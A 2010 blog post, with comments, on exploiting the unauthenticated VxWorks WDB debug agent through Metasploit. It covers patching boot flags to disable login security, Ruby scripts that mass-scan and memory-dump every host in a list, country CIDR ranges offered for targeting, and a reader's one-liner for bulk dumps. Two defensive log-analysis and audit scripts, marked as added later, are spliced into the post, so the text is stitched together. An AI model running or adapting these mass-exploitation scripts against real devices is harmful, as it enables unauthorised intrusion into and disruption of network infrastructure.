Friday, August 6, 2010

Metasploit VxWorks WDB Agent Attack Automation

In CHINA pwnage is still called pwnage.

CERT published multiple advisories this week for the VxWorks operating system. The details can be found in VU#362332 and VU#840249. If you want more information on the Metasploit exploitation process, check out the awesome write-up posted on the Metasploit blog.

A few things you should know about the exploit.

The VxWorks debug service runs on port 17185 (UDP).

An attacker can carry out the following attacks without any authentication while maintaining a certain level of stealth.

  1. Remote memory dump
  2. Remote memory patch
  3. Remote calls to functions
  4. Remote task management
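Seen from the defender's side, the first question is whether anything on the network is talking to that port at all. The Ruby below is an added example (not from the original post or from Metasploit) that picks UDP/17185 hits out of netfilter-style firewall log lines and reports any source that touches several destinations, which is what a host-list sweep like the one automated later in the post looks like. The log lines are constructed; the field layout follows the iptables LOG target, and the sweep threshold is an arbitrary choice.

```ruby
# Added example (not from the original post): find WDB agent traffic
# (UDP/17185) in iptables-style LOG lines and flag sweeps, i.e. one source
# probing many destinations. All log lines below are constructed.

WDB_PORT = 17185

# Pulls the fields we need out of a netfilter LOG line.
LOG_RE = /SRC=(?<src>\S+) DST=(?<dst>\S+) .*?PROTO=(?<proto>\w+) .*?DPT=(?<dpt>\d+)/

# Returns {src:, dst:} for every line that is UDP to the WDB port.
def wdb_hits(lines)
  lines.each_with_object([]) do |line, hits|
    m = LOG_RE.match(line)
    next unless m && m[:proto] == "UDP" && m[:dpt].to_i == WDB_PORT
    hits << { src: m[:src], dst: m[:dst] }
  end
end

# Groups hits by source; a source that reached at least +threshold+ distinct
# destinations is reported as a sweep (threshold is an arbitrary assumption).
def wdb_sweeps(lines, threshold: 3)
  by_src = Hash.new { |h, k| h[k] = [] }
  wdb_hits(lines).each { |h| by_src[h[:src]] << h[:dst] }
  by_src.each_with_object({}) do |(src, dsts), out|
    uniq = dsts.uniq
    out[src] = uniq if uniq.size >= threshold
  end
end

# Constructed sample log: one source sweeping three devices, one source
# touching a single device, a TCP probe to the same port, and DNS traffic.
SAMPLE_LOG = <<~LOG.lines(chomp: true)
  Aug  6 10:01:02 fw kernel: IN=eth0 OUT=eth1 SRC=192.0.2.10 DST=198.51.100.1 LEN=52 TTL=63 PROTO=UDP SPT=51234 DPT=17185 LEN=32
  Aug  6 10:01:02 fw kernel: IN=eth0 OUT=eth1 SRC=192.0.2.10 DST=198.51.100.2 LEN=52 TTL=63 PROTO=UDP SPT=51234 DPT=17185 LEN=32
  Aug  6 10:01:03 fw kernel: IN=eth0 OUT=eth1 SRC=192.0.2.10 DST=198.51.100.3 LEN=52 TTL=63 PROTO=UDP SPT=51234 DPT=17185 LEN=32
  Aug  6 10:01:09 fw kernel: IN=eth0 OUT=eth1 SRC=192.0.2.10 DST=198.51.100.1 LEN=52 TTL=63 PROTO=UDP SPT=51234 DPT=17185 LEN=32
  Aug  6 10:02:11 fw kernel: IN=eth0 OUT=eth1 SRC=192.0.2.20 DST=198.51.100.1 LEN=52 TTL=63 PROTO=UDP SPT=40000 DPT=17185 LEN=32
  Aug  6 10:02:12 fw kernel: IN=eth0 OUT=eth1 SRC=192.0.2.30 DST=198.51.100.1 LEN=60 TTL=63 PROTO=TCP SPT=40001 DPT=17185 WINDOW=65535
  Aug  6 10:02:13 fw kernel: IN=eth0 OUT=eth1 SRC=192.0.2.10 DST=198.51.100.4 LEN=61 TTL=63 PROTO=UDP SPT=51235 DPT=53 LEN=41
LOG

if __FILE__ == $0
  puts "WDB hits: #{wdb_hits(SAMPLE_LOG).size}"
  wdb_sweeps(SAMPLE_LOG).each do |src, dsts|
    puts "sweep from #{src}: #{dsts.join(', ')}"
  end
end
```

The TCP line is deliberately ignored: the WDB agent is UDP only, so a TCP connection to 17185 is noise rather than a debug-agent request. Lowering the threshold to 1 turns the script into a plain "anyone touched the port" alert, which is the more useful setting on a network where no host should be speaking WDB at all.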
 
Go big or go home...
 
In June, I started testing some of the VxWorks WDB Metasploit modules HD put together. My initial goal was to look at other possible vectors of exploitation, i.e., the boot flag manipulation. We discussed this at BSidesLasVegas and Defcon. The next goal was to write my own exploit for a specific product.

The twenty-flag (0x20), as I like to call it, disables login security on VxWorks devices. The amazing thing about changing flags is that the change survives a soft reset. I did have some trouble on a few devices: the offset of the flags can vary depending on the hardware version of the device.

In addition, if you decide to write a VxWorks wdbrpc exploit, make sure you add a function that first reads from memory to identify the target version, so that you patch at the correct offset. Otherwise your module will be prone to errors. See the dlink_i2eye_autoanswer module for a good example of adding multiple targets.

The following image shows the delta between two Huawei IAD (Integrated Access Device) memory dumps: the first displays the boot flags before the change and the other after the exploit.

Huawei IAD2 boot flags:
  • 0x02 - load local system symbols
  • 0x04 - don't autoboot
  • 0x08 - quick autoboot (no countdown)
  • 0x20 - disable login security
  • 0x40 - use bootp to get boot parameters
  • 0x80 - use tftp to get boot image
  • 0x100 - use proxy arp

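As an added example (not code from the original post or from Metasploit), the Ruby below does the two things the paragraphs and table above describe, but in an auditing role: it diffs two memory images to find which offsets changed, and decodes the flag word at a given offset with the table above so you can confirm whether the 0x20 bit is set on a device. The sample images, the flag offset (0x10) and the big-endian word layout are constructed assumptions; on real hardware the offset varies by hardware version, exactly as the post warns.

```ruby
# Added example (not from the original post): decode a VxWorks boot-flag
# word with the flag table above, and locate the flag word by diffing two
# memory images. Sample images and the flag offset are constructed.

BOOT_FLAGS = {
  0x02  => "load local system symbols",
  0x04  => "don't autoboot",
  0x08  => "quick autoboot (no countdown)",
  0x20  => "disable login security",
  0x40  => "use bootp to get boot parameters",
  0x80  => "use tftp to get boot image",
  0x100 => "use proxy arp",
}.freeze

# Names of every flag set in +word+, in table order.
def decode_boot_flags(word)
  BOOT_FLAGS.select { |bit, _| (word & bit) != 0 }.values
end

# True when the 0x20 bit is set, i.e. login security is off.
def login_security_disabled?(word)
  (word & 0x20) != 0
end

# Byte offsets at which two same-sized images differ.
def diff_offsets(before, after)
  raise ArgumentError, "images differ in size" unless before.bytesize == after.bytesize
  before.bytes.each_index.select { |i| before.getbyte(i) != after.getbyte(i) }
end

# Reads a 32-bit word; the constructed sample stores it big-endian.
def read_word_be(image, offset)
  image.byteslice(offset, 4).unpack1("N")
end

# Audit: given a before/after pair and a known flag offset, report whether
# the delta touched the boot flags and how the decoded flags changed.
def audit_boot_flags(before, after, flag_offset)
  changed  = diff_offsets(before, after)
  touched  = changed.any? { |o| o.between?(flag_offset, flag_offset + 3) }
  old_word = read_word_be(before, flag_offset)
  new_word = read_word_be(after, flag_offset)
  {
    changed_offsets: changed,
    flags_touched: touched,
    before: decode_boot_flags(old_word),
    after: decode_boot_flags(new_word),
    login_security_now_disabled: login_security_disabled?(new_word),
  }
end

# Constructed sample: two 64-byte images whose flag word sits at offset 0x10
# (hypothetical offset). The "after" image has 0x20 added to the word.
SAMPLE_FLAG_OFFSET = 0x10
SAMPLE_BEFORE = ("\x00" * 64).b
SAMPLE_BEFORE[SAMPLE_FLAG_OFFSET, 4] = [0x08].pack("N")         # quick autoboot only
SAMPLE_AFTER = SAMPLE_BEFORE.dup
SAMPLE_AFTER[SAMPLE_FLAG_OFFSET, 4] = [0x08 | 0x20].pack("N")   # login security off

if __FILE__ == $0
  report = audit_boot_flags(SAMPLE_BEFORE, SAMPLE_AFTER, SAMPLE_FLAG_OFFSET)
  puts "changed offsets: #{report[:changed_offsets].map { |o| format('0x%02x', o) }.join(', ')}"
  puts "before: #{report[:before].join(', ')}"
  puts "after:  #{report[:after].join(', ')}"
  puts "login security disabled: #{report[:login_security_now_disabled]}"
end
```

The same diff-then-decode pass works on real dumps as long as you know the flag offset for that hardware revision; comparing a freshly taken dump against a known-good baseline from the same device model is a cheap way to notice that the 0x20 bit has appeared where it should not be.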
Now, if we add one line of Ruby code to the end of our exploit module, we can issue a soft reset to the vulnerable device after a remote patch, with the new unlocked features enabled at next boot! #FTW

While a soft reset isn't always necessary, and can draw unwanted attention, especially during a penetration test or a live exercise, it is unfortunately required when manipulating boot flags, so remember to use it with care.

We can also locate other devices on the LAN, change tftp parameters, backdoor a device and obviously cause unwanted interference.

Depending on the target, you may be able to unlock, disable or enable certain functionality on most devices running the VxWorks WDB agent.

What does the data look like?

A few examples of the exploit might allow you to write your name on Mars or even shut down 60% of two of the largest telecommunication companies in CHINA, specifically CHINA Telecom and CHINA UNICOM.

I ran a smoke test for approximately 24 hours using the Metasploit framework in a cloud computing environment. Just to give you an example, a single vulnerable device might very well be a telecommunication switch providing access to a backbone for an entire province within a country, or even several interconnected core routes. In other words, don't let the number of vulnerable devices dictate the importance of the results. I also performed a simple whois query on the results, and was then able to parse the location data and map out various flash-points.

How can I automate the scanning process in Metasploit?

It's actually very simple. Feel free to modify the script to your own liking. It's more of a proof of concept to show others how simple it is to automate Metasploit.

Taking over the internetz in 3 easy steps.

1. Install Metasploit.

2. Add your targets to a host list.

3. Run the script.


Moreover, the script is also useful if you want to automate the memory dump process after all of your scans are complete. The dump process can take a very long time which is exactly why automation is so important.

Just change the module in vxworks.rc to the memory dump module and set the dump name (LPATH) to include the #{line} variable (the target IP read from hosts.log); the result is one dump file per target, with the target IP appended to the vxworks_memory file name.

No worries... I've done it for you! :)




VxWorks WDB Agent AutoScan

----snip----
#!/usr/bin/ruby
# VxWorks WDB Agent AutoScan: runs the wdbrpc_version scanner against every
# host in hosts.log, one msfconsole session per host, and removes each host
# from the list once it has been scanned so the run can be resumed.

RC_FILE   = 'vxworks.rc'
HOST_FILE = 'hosts.log'

# Removes the first (just-processed) IP block from the host list.
def remove_line(log = HOST_FILE)
  text = ''
  File.open(log, 'r') { |f| f.gets; text = f.read }
  File.write(log, text)
end

# Writes a fresh rc file for one target. Writing the RHOSTS value directly
# replaces the original's write-then-gsub (SwapRHOSTS) step; the resulting
# rc file is identical.
def write_rc(target)
  File.open(RC_FILE, 'w') do |m|
    m.puts "db_driver sqlite3"
    m.puts "db_connect scandb"
    m.puts "use scanner/vxworks/wdbrpc_version"
    m.puts "set RHOSTS #{target}"
    m.puts "run"
    m.puts "exit"
  end
end

# Read the whole list up front: the original iterated over an open handle
# on hosts.log while rewriting that same file, which is fragile.
File.readlines(HOST_FILE).each do |line|
  target = line.chomp
  next if target.empty?
  puts "Target: #{target}"
  write_rc(target)
  system("msfconsole -r #{RC_FILE}")
  remove_line
end
----snip----


VxWorks WDB Agent AutoDump

----snip----
#!/usr/bin/ruby
# VxWorks WDB Agent AutoDump: same loop as AutoScan, but runs the memory
# dump module against each host in hosts.log and names the dump file after
# the target IP (/tmp/vxworks_memory_<ip>).

RC_FILE   = 'vxworks.rc'
HOST_FILE = 'hosts.log'

# Removes the first (just-processed) IP block from the host list.
def remove_line(log = HOST_FILE)
  text = ''
  File.open(log, 'r') { |f| f.gets; text = f.read }
  File.write(log, text)
end

# Writes a fresh rc file for one target; RHOST and LPATH are written
# directly instead of the original's write-then-gsub step.
def write_rc(target)
  File.open(RC_FILE, 'w') do |m|
    m.puts "db_driver sqlite3"
    m.puts "db_connect scandb"
    m.puts "use admin/vxworks/wdbrpc_memory_dump"
    m.puts "set LPATH /tmp/vxworks_memory_#{target}"
    m.puts "set RHOST #{target}"
    m.puts "run"
    m.puts "exit"
  end
end

# Read the whole list up front rather than iterating over a handle on a
# file that remove_line rewrites on every pass.
File.readlines(HOST_FILE).each do |line|
  target = line.chomp
  next if target.empty?
  puts "Target: #{target}"
  write_rc(target)
  system("msfconsole -r #{RC_FILE}")
  remove_line
end
----snip----

Here is a decent starting point for some passive reconnaissance.

Korea CIDR
China CIDR
India CIDR
Russia CIDR
Turkey CIDR
Viet Nam CIDR
Ukraine CIDR
Brazil CIDR
Venezuela CIDR
Pakistan CIDR


I'm not a Ruby developer. I just picked it up a few months ago. The automation is quick and dirty but it should get the job done.

In terms of new exploits for different types of vendor specific products Wind River has opened up Pandora's box, not the researchers.

It was a true honor to be a part of such an exciting research project.

-D1N

17 comments:

  1. Awesome work. I was super lazy in my auto-dumping efforts. After copying the results from the scan into a file from msfconsole and massaging it into just a list of IPs via grep/cut/awk, I used a bash one-liner with msfcli to dump memory from each device into a file based on its IP.

    for i in `cat hosts`; do ./msfcli auxiliary/admin/vxworks/wdbrpc_memory_dump RHOST=$i LPATH=/tmp/vxworks/$i E ; done

    Yeah, I know....lazy, but it worked like a charm!

  2. Hey there. I am working on the memory dump phase as well. I am able to get the memory size and the bootline of the VxWorks system, but I am not able to get the memory dump done. Any chance you could offer me some of your time to help me with my research?

  3. Hi Guys

    That bug is really important for me. I used it with Metasploit and I have got vxworks.dmp. How can I open it, and what will happen after I open that file? I need to execute my commands, or I want to get a shell on the server. Whoever helps me with this, I will also give $50.

    Please, I need it for my test.
    Waiting for your replies.

    Thanks
    CyberLord
